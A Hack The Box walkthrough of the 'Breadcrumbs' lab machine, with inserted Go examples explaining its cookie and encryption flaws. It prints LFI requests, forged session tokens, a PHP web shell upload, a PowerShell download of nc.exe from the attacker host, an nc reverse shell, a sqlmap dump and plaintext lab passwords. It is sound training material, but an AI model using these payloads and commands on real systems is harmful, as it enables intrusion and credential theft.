Hack-The-Box-walkthrough[Breadcrumbs]

introduction

OS: Windows
Difficulty: Hard
Points: 40
Release: 20 Feb 2021
IP: 10.10.10.228


information gathering

First, run nmap as usual:

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.228
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp open microsoft-ds?
3306/tcp open mysql?
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=2/23%Time=6034FA27%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Description

There is an LFI on the books page. Search for a book and intercept the POST request: set the method parameter to 1, and replace the title and author parameters with a single book parameter.

POST /includes/bookController.php HTTP/1.1
Host: 10.10.10.228
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

book=../index.php&method=1

Use it to read files. Look at the portal's sign-in files to find the secret key used for the tokens and the PHP that shows how the cookie is made.

Read the cookie code. The PHPSESSID is the username followed by the MD5 of a string that contains one random letter from the username.

POST /includes/bookController.php HTTP/1.1
Host: 10.10.10.228
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

book=../portal/cookie.php&method=1

Response (the escaped JSON string decoded into readable PHP):

<?php
/**
 * @param string $username  Username requesting session cookie
 *
 * @return string $session_cookie Returns the generated cookie
 *
 * @devteam
 * Please DO NOT use default PHPSESSID; our security team says they are predictable.
 * CHANGE SECOND PART OF MD5 KEY EVERY WEEK
 * */
function makesession($username){
    $max = strlen($username) - 1;
    $seed = rand(0, $max);
    $key = "s4lTy_stR1nG_".$username[$seed]."(!528./9890";
    $session_cookie = $username.md5($key);

    return $session_cookie;
}

Paul's PHPSESSID:

paul47200b180ccd6835d25d034eeb6e6390
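To see why the dev-team comment calls these cookies predictable, here is an added example (my own Go, not the box's code) that ports makesession one to one: the only unknown is which character of the username was picked, so a known username yields at most len(username) candidate cookies. sessionCandidates, entropyBits and secureSessionID are names of my own; the last one is the fix a reviewer would ask for.

```go
package main

import (
	"crypto/md5"
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"math"
)

// makesession ports the leaked portal/cookie.php one to one. Its only
// secret is one character taken from the username itself.
func makesession(username string, seed int) string {
	key := "s4lTy_stR1nG_" + string(username[seed]) + "(!528./9890"
	sum := md5.Sum([]byte(key))
	return username + hex.EncodeToString(sum[:])
}

// sessionCandidates lists every cookie makesession can emit for a
// username: at most one per distinct character, i.e. the whole
// search space a guesser has to cover.
func sessionCandidates(username string) []string {
	seen := map[string]bool{}
	var out []string
	for i := range username {
		c := makesession(username, i)
		if !seen[c] {
			seen[c] = true
			out = append(out, c)
		}
	}
	return out
}

// entropyBits is log2 of the candidate count: the effective
// strength of the session cookie for that user.
func entropyBits(username string) float64 {
	return math.Log2(float64(len(sessionCandidates(username))))
}

// secureSessionID is the fix: 128 bits from the OS CSPRNG, with
// nothing derived from the user name.
func secureSessionID() (string, error) {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return hex.EncodeToString(b), nil
}

func main() {
	fmt.Println(sessionCandidates("paul"))
	fmt.Printf("effective entropy: %.0f bits\n", entropyBits("paul"))
}
```

For "paul" the whole keyspace is four cookies (2 bits); for a name made of one repeated letter it is a single cookie.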

Get the secret key:

POST /includes/bookController.php HTTP/1.1
Host: 10.10.10.228
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

book=../portal/authController.php&method=1

The secret key is in the response:

$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';

Create a new JWT (HS256, payload {"data":{"username":"paul"}}) signed with the secret key you found. The token is:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Log into the portal with any account, replace your cookies with the forged PHPSESSID and token, and refresh.

Now you are paul.

get user

Go to file management and upload a PHP script in a file (e.g. reverseshell.html). Intercept the request with Burp Suite and change the .zip at the bottom (the task field) to .php. If that does not work, pad the file with the title and author of a valid book, like the ones at http://10.10.10.228/books.

Because the upload button does not work, read the following script and build the file upload request by hand:

http://10.10.10.228/portal/assets/js/files.js
POST /portal/includes/fileController.php HTTP/1.1
Host: 10.10.10.228
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 295

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="shell.html"
Content-Type: text/html

<?php phpinfo();?>
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="task"

test.php
------WebKitFormBoundary7MA4YWxkTrZu0gW--

Response:

HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 16:37:26 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
X-Powered-By: PHP/8.0.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30
Connection: close
Content-Type: text/html; charset=UTF-8

Success. Have a great weekend!

Now replace phpinfo() with the following, and add some HTML filler (book title and author text) next to it, to get command execution:

<?php
system($_GET['cmd']);
?>
<h3>Title: Animal Farm</h3>
<p>Author: George Orwell </p>
<p style="color: red;">Max borrow duration: 8 days</p>
<p>About:<br>Animal Farm is an allegorical novella by George Orwell, first published in England on 17 August 1945. The book tells the story of a group of farm animals who rebel against their human farmer, hoping to create a society where the animals can be equal, free, and happy.</p>

Go to http://10.10.10.228/portal/uploads to execute your file; you now have command execution:

http://10.10.10.228/portal/uploads/luci.php?cmd=systeminfo


Host Name: BREADCRUMBS
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19041 N/A Build 19041
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: temp
Registered Organization:
Product ID: 00331-20309-59368-AA373
Original Install Date: 1/15/2021, 3:27:37 PM
System Boot Time: 2/23/2021, 4:41:02 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC

Now use nc to get a shell.

Download nc onto the box:

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.228 - - [23/Feb/2021 12:30:00] "GET /nc.exe HTTP/1.1" 200 -
http://10.10.10.228/portal/uploads/luci.php?cmd=powershell%20(new-object%20Net.WebClient).DownloadFile(%27http://10.10.14.12/nc.exe%27,%27C:\\Users\\www-data\\Desktop\\xampp\\htdocs\\portal\\uploads\\nc.exe%27)

Then get a reverse shell:

http://10.10.10.228/portal/uploads/luci.php?cmd=nc.exe%2010.10.14.12%203221%20-e%20c:\windows\system32\cmd.exe
┌──(root💀kali)-[~]
└─# nc -lvp 3221
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::3221
Ncat: Listening on 0.0.0.0:3221
Ncat: Connection from 10.10.10.228.
Ncat: Connection from 10.10.10.228:50994.
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads>whoami
whoami
breadcrumbs\www-data

C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A

Directory of C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads

02/23/2021 09:41 AM <DIR> .
02/23/2021 09:41 AM <DIR> ..
02/23/2021 09:13 AM 437 luci.php
02/23/2021 09:41 AM 45,272 nc.exe
02/23/2021 08:37 AM 18 test.php
02/23/2021 09:04 AM 467 test11.php
4 File(s) 46,194 bytes
2 Dir(s) 6,313,857,024 bytes free

Look through the folders and find Juliette's password:

C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData>type juliette.json
type juliette.json
{
"pizza" : "margherita",
"size" : "large",
"drink" : "water",
"card" : "VISA",
"PIN" : "9890",
"alternate" : {
"username" : "juliette",
"password" : "jUli901./())!",
}
}

SSH into the box and get the user flag:

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# ssh juliette@10.10.10.228
juliette@10.10.10.228's password:
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.

juliette@BREADCRUMBS C:\Users\juliette>whoami
breadcrumbs\juliette

juliette@BREADCRUMBS C:\Users\juliette>dir
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A

Directory of C:\Users\juliette

02/01/2021 05:48 AM <DIR> .
02/01/2021 05:48 AM <DIR> ..
01/15/2021 04:00 PM <DIR> 3D Objects
01/15/2021 04:00 PM <DIR> Contacts
01/15/2021 04:04 PM <DIR> Desktop
01/15/2021 04:00 PM <DIR> Documents
01/15/2021 04:00 PM <DIR> Downloads
01/15/2021 04:00 PM <DIR> Favorites
01/15/2021 04:00 PM <DIR> Links
01/15/2021 04:00 PM <DIR> Music
01/15/2021 04:03 PM <DIR> OneDrive
01/15/2021 04:00 PM <DIR> Pictures
01/15/2021 04:00 PM <DIR> Saved Games
01/15/2021 04:00 PM <DIR> Searches
01/15/2021 04:00 PM <DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 6,313,771,008 bytes free

juliette@BREADCRUMBS C:\Users\juliette>dir Desktop
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A

Directory of C:\Users\juliette\Desktop

01/15/2021 04:04 PM <DIR> .
01/15/2021 04:04 PM <DIR> ..
12/09/2020 06:27 AM 753 todo.html
02/23/2021 04:42 AM 34 user.txt
2 File(s) 787 bytes
2 Dir(s) 6,313,771,008 bytes free

juliette@BREADCRUMBS C:\Users\juliette>type Desktop\user.txt
46c5036915d0f9a7dc2e480befc603d5

get administrator

juliette@BREADCRUMBS C:\Users\juliette\Desktop>type todo.html
<html>
<style>
html{
background:black;
color:orange;
}
table,th,td{
border:1px solid orange;
padding:1em;
border-collapse:collapse;
}
</style>
<table>
<tr>
<th>Task</th>
<th>Status</th>
<th>Reason</th>
</tr>
<tr>
<td>Configure firewall for port 22 and 445</td>
<td>Not started</td>
<td>Unauthorized access might be possible</td>
</tr>
<tr>
<td>Migrate passwords from the Microsoft Store Sticky Notes application to our new password manager</td>
<td>In progress</td>
<td>It stores passwords in plain text</td>
</tr>
<tr>
<td>Add new features to password manager</td>
<td>Not started</td>
<td>To get promoted, hopefully lol</td>
</tr>
</table>

</html>

Now we need the development user. Go to the Sticky Notes data directory on Windows and download:
plum.sqlite
plum.sqlite-shm
plum.sqlite-wal

juliette@BREADCRUMBS C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState>dir
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A

Directory of C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState

01/15/2021 04:10 PM <DIR> .
01/15/2021 04:10 PM <DIR> ..
01/15/2021 04:10 PM 20,480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
11/29/2020 03:10 AM 4,096 plum.sqlite
01/15/2021 04:10 PM 32,768 plum.sqlite-shm
01/15/2021 04:10 PM 329,632 plum.sqlite-wal
4 File(s) 386,976 bytes
2 Dir(s) 6,313,762,816 bytes free

You can use msf to get a reverse shell and download the files.

Open the SQLite database (I copied it back to my box over SMB).

Read all the notes, then SSH as development with the password from the note:

juliette: jUli901./())!
development: fN3)sN5Ee@g
administrator: [MOVED]

Development

Go to C:\Development

There is a Linux binary there with useful information inside:

development@BREADCRUMBS C:\Users\development>cd C:\Development

development@BREADCRUMBS C:\Development>dir
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A

Directory of C:\Development

01/15/2021 04:03 PM <DIR> .
01/15/2021 04:03 PM <DIR> ..
11/29/2020 03:11 AM 18,312 Krypter_Linux
1 File(s) 18,312 bytes
2 Dir(s) 6,310,158,336 bytes free

Krypter_Linux

Open Krypter_Linux in IDA.

Inside there is a request to a local service; you can see what it does on the box by running:

PS C:\Development> curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing


StatusCode : 200
StatusDescription : OK
Content : selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}

RawContent : HTTP/1.1 200 OK
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 96
Content-Type: text/html; charset=UTF-8
Date: Tue, 23 Feb 2021 19:24:09 GMT
Server: Apache/2.4.46 (Win64) ...
Forms :
Headers : {[Keep-Alive, timeout=5, max=100], [Connection, Keep-Alive], [Content-Length, 96], [Content-Type,
text/html; charset=UTF-8]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml :
RawContentLength : 96

That returns the AES key, but the URL is also injectable with sqlmap. Port-forward it first so you can run sqlmap from Kali:

ssh -N -L 1234:127.0.0.1:1234 development@10.10.10.228

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}

Run sqlmap with --dump against it:

sqlmap -u http://127.0.0.1:1234/index.php\?method\=select\&username\=administrator\&table\=passwords --dump

Database: bread
Table: passwords
[1 entry]
+----+---------------+------------------+----------------------------------------------+
| id | account | aes_key | password |
+----+---------------+------------------+----------------------------------------------+
| 1 | Administrator | k19D193j.<19391( | H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= |
+----+---------------+------------------+----------------------------------------------+

This gives the output string:

H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=

with the key:

k19D193j.<19391(

Base64-decode the string, then AES-decrypt the result (CBC mode). In CyberChef set input and output to Raw, give the key as Latin1 and the IV as hex (IV = 0000000000000000).

Go to the following CyberChef URL:

https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0

Finally, the administrator's password is:

p@ssw0rd!@#$9890./
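The same decryption as the CyberChef recipe, as an added Go example that is not part of the original post or the box's code. It takes the key and ciphertext exactly as dumped, assumes PKCS#7 padding (standard for CBC; it falls back to zero padding), and makes the real finding visible in code: the AES key is stored in the same row as the ciphertext and the IV is all zeros, so the "encryption" protects nothing once the table is readable. decryptStoredPassword and unpad are my own names.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// Values exactly as dumped from the passwords table above; key and
// ciphertext sit in the same row, so one injection yields both.
const (
	dumpedKey    = "k19D193j.<19391("
	dumpedCipher = "H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw="
)

// decryptStoredPassword follows the CyberChef recipe: base64 decode,
// AES-128-CBC with the 16-byte key and an all-zero IV, then unpad.
func decryptStoredPassword(b64, key string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher([]byte(key)) // rejects bad key sizes
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not whole AES blocks")
	}
	iv := make([]byte, aes.BlockSize) // 16 zero bytes, as in the recipe
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return string(unpad(pt)), nil
}

// unpad strips PKCS#7 padding (assumed); if the tail is not valid
// PKCS#7 it trims trailing NULs instead, which zero-padding leaves.
func unpad(pt []byte) []byte {
	n := int(pt[len(pt)-1])
	if n >= 1 && n <= aes.BlockSize && n <= len(pt) &&
		bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return pt[:len(pt)-n]
	}
	return bytes.TrimRight(pt, "\x00")
}

func main() {
	pw, err := decryptStoredPassword(dumpedCipher, dumpedKey)
	fmt.Println(pw, err)
}
```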

Then get the root flag:

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# ssh administrator@10.10.10.228
administrator@10.10.10.228's password:
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.

administrator@BREADCRUMBS C:\Users\Administrator>whoami
breadcrumbs\administrator

administrator@BREADCRUMBS C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A

Directory of C:\Users\Administrator

01/26/2021 09:06 AM <DIR> .
01/26/2021 09:06 AM <DIR> ..
01/15/2021 03:56 PM <DIR> 3D Objects
01/15/2021 03:56 PM <DIR> Contacts
02/09/2021 07:08 AM <DIR> Desktop
01/15/2021 03:56 PM <DIR> Documents
01/15/2021 03:56 PM <DIR> Downloads
01/15/2021 03:56 PM <DIR> Favorites
01/15/2021 03:56 PM <DIR> Links
01/15/2021 03:56 PM <DIR> Music
01/15/2021 04:00 PM <DIR> OneDrive
01/15/2021 03:57 PM <DIR> Pictures
01/15/2021 03:56 PM <DIR> Saved Games
01/15/2021 03:57 PM <DIR> Searches
01/15/2021 03:56 PM <DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 6,308,880,384 bytes free

administrator@BREADCRUMBS C:\Users\Administrator>type Desktop\root.txt
a47ac3139f51cdd4a4d30614eb277101

Summary of knowledge

  • LFI
  • phpsessid and jwt token forge
  • crafting the file upload request by hand to bypass the upload restriction
  • .sqlite file leaking passwords
  • analysing a binary in IDA
  • port forwarding
  • dumping secrets with sqlmap

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…